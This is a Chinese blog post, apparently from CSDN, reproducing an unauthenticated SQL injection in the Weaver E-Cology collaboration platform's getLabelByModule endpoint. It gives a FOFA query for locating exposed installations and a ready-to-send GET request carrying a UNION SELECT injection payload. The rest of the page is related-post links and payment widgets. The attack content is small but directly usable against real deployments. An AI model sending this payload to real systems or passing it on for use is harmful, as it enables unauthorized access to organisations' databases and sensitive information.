泛微E-Cology getLabelByModule SQL注入(含批量验证poc)

已于 2024-04-18 09:59:56 修改
阅读量42 收藏
点赞数
分类专栏: 漏洞复现 文章标签: sql 数据库 web安全
于 2024-04-18 09:59:39 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_43567873/article/details/137908375
版权

产品介绍

泛微协同管理应用平台e-cology是一套兼具企业信息门户、知识文档管理、工作流程管理、人力资源管理、客户关系管理、项目管理、财务管理、资产管理、供应链管理、数据中心功能的企业大型协同管理平台。

漏洞描述

由于泛微e-cology未对用户的输入进行有效的过滤,直接将其拼接进了SQL查询语句中,导致系统出现SQL注入漏洞。远程未授权攻击者可利用此漏洞获取敏感信息,进一步利用可能获取目标系统权限等。

复现环境

FOFA:app=”泛微-E-Weaver”

image.png

漏洞复现

http://your-ip/api/ec/dev/locale/getLabelByModule

POC

GET /api/ec/dev/locale/getLabelByModule?moduleCode=?moduleCode=?moduleCode=1%27)%20union%20all%20select%20%27666666,%27%20-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.0.0 Safari/537.36
Connection: close
Accept-Encoding: gzip, deflate

出现

了解本专栏 订阅专栏 解锁全文 超级会员免费看
今天晚上早睡觉
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
订阅专栏
e-cology9 SQL注入漏洞复现(QVD-2023-5012)
0xSec
03-20 1万+
e-cology9中存在SQL注入漏洞,未经身份认证的远程攻击者即可利用此漏洞获取数据库敏感信息,进一步利用可能导致目标系统被控。
E-Cology getLabelByModule SQL注入漏洞复现
0xSec
01-18 903
由于e-cology未对用户的输入进行有效的过滤,直接将其拼接进了SQL查询语句中,导致系统出现SQL注入漏洞。远程未授权攻击者可利用此漏洞获取敏感信息,进一步利用可能获取目标系统权限等。
weaver-getLabelByModule-SQL注入漏洞-漏洞复现
weixin_43167326的博客
01-20 582
E-Cology以移动互联下的组织社交化转型需求为导向,采用轻前端重后端的设计思路,在前端面向用户提供个性化的办公平台,后端引擎帮助企业高效整合既有的IT资源生成符合用户需求的IT应用,并能够与e-mobile、移动集成平台等双剑合璧,帮助企业通过APP、信、钉钉等多种路径实现移动协同办公。
E-Cology SQL注入漏洞复现(QVD-2023-15672)
huangyongkang666的博客
11-27 773
E-Cology SQL注入漏洞复现(QVD-2023-15672)weaverweaver.file.FileDownloadForOutDoc
CNVD-2023-12632 e-cology9 sql注入poc
三天不打上房揭瓦的博客
03-18 4704
由于e-cology9中对用户前台输入的数据未做校验,可以通过构造恶意的数据包导致SQL注入漏洞,进一步获取敏感数据。
E-cology8管理员后端维护手册全套
09-30
E-cology8管理员后端维护手册全套,包OA里面所有后端模块,希望对大家有用,谢谢.
E-cology9.0(EC9)官方前台全套操作手册
09-29
E-cology9.0(EC9)官方前台全套操作手册,包9个文档,word格式。注意这是操作手册,不是二开文档!适合操作人员使用
E-cology9.0(EC9)官方后台全套操作手册
09-29
E-cology9.0(EC9)官方后台全套操作手册,包20几个文档,WORD格式。注意这是操作手册,不是二次开发手册。适合系统操作人员阅读。
E-cology8.0后台维护手册-PDF版.zip
02-09
E-cology8.0后台维护手册-PDF版: 协同办公平台E-cology8.0版本后台维护手册(0)--组织权限中心 协同办公平台E-cology8.0版本后台维护手册(1)--流程引擎 协同办公平台E-cology8.0版本后台维护手册...
【PostgreSQL17新特性之-explain命令新增选项】
最新发布
小怪兽的博客
05-31 542
PostgreSQL17-beta1版本近日发布了,新版本里,explain命令新增了两个选项,分别是MEMORY 和SUMMARY。
基础—SQL—DQL(数据查询语言)聚合函数
m0_74363339的博客
05-30 256
这篇博客主要讲到了SQL分类中的DQL(数据查询语言)—聚合函数的讲解,聚合函数比较简单,但它主要配合着分组查询进行数据查询的操作,注意NULL的字段值不参与聚合函数的运算......
PostgreSQL常用插件
PGCCC的博客
05-29 511
1.提供 PostgreSQL 实例的操作系统级别的资源使用情况,包括缓存命中率和磁盘 IO 等。通过使用这些插件,您可以大大增强 PostgreSQL 的功能,满足各种复杂的应用需求。1.提供三元组(trigram)相似度匹配和索引功能,常用于模糊搜索和文本相似度匹配。1.增加对地理空间数据的支持,使 PostgreSQL 成为一个功能强大的空间数据库。1.PostgreSQL 的过程语言,允许用户编写存储过程和触发器。1.基于逻辑复制的插件,提供更细粒度的数据复制控制和双向复制能力。
postgressql——Tuple学习(2)
Re_view的博客
05-27 270
postgressql——Tuple学习(2)
PostgreSQL发展史
PGCCC的博客
05-28 922
PostgreSQL 的发展史反映了其从学术研究项目到全球领先的开源数据库系统的演变过程。通过不断的创新和社区支持,PostgreSQL 已经成为一个功能强大、性能优越的数据库管理系统,广应用于各个行业的关键业务场景中。#postgresql培训。
postgressql——ReadBuffer_common函数(7)
Re_view的博客
05-31 254
postgressql——ReadBuffer_common函数(7)
e-cology 前台文件上传漏洞
07-28
e-cology前台文件上传漏洞是指在e-cology系统的前台功能中存在漏洞,攻击者可以利用该漏洞上传恶意文件到服务器上。根据引用\[1\]中提到的CNVD-2020-33199漏洞编号,该漏洞可能存在于e-cology9版本的前台文件上传功能中。具体触发点位于文件/global_search.php的第108行,调用了doc2text()函数,并追溯到doc2txt()函数中的$FILE_PATH参数的源代码。该参数连接了附件目录(C:\eoffice9\webroot\ATTACHMENT)的数据表FLE_CONTENT中ATTACHMENT_ID和ATTACHMENT_NAME列的值,以获取完整的文件路径。\[2\] 需要注意的是,根据引用\[3\]中的声明,本文提供的信息仅供网络安全人员参考,未经授权请勿利用文章中的技术资料进行任何入侵操作。同时,禁止将本文提供的工具用于其他目的。 #### 引用[.reference_title] - *1* [e-cology9前台文件上传漏洞复现](https://blog.csdn.net/qq_41490561/article/details/116119845)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^insert_down28v1,239^v3^insert_chatgpt"}} ] [.reference_item] - *2* *3* [E-Office前台文件上传漏洞](https://blog.csdn.net/u010025272/article/details/131312528)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^insert_down28v1,239^v3^insert_chatgpt"}} ] [.reference_item] [ .reference_list ]

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值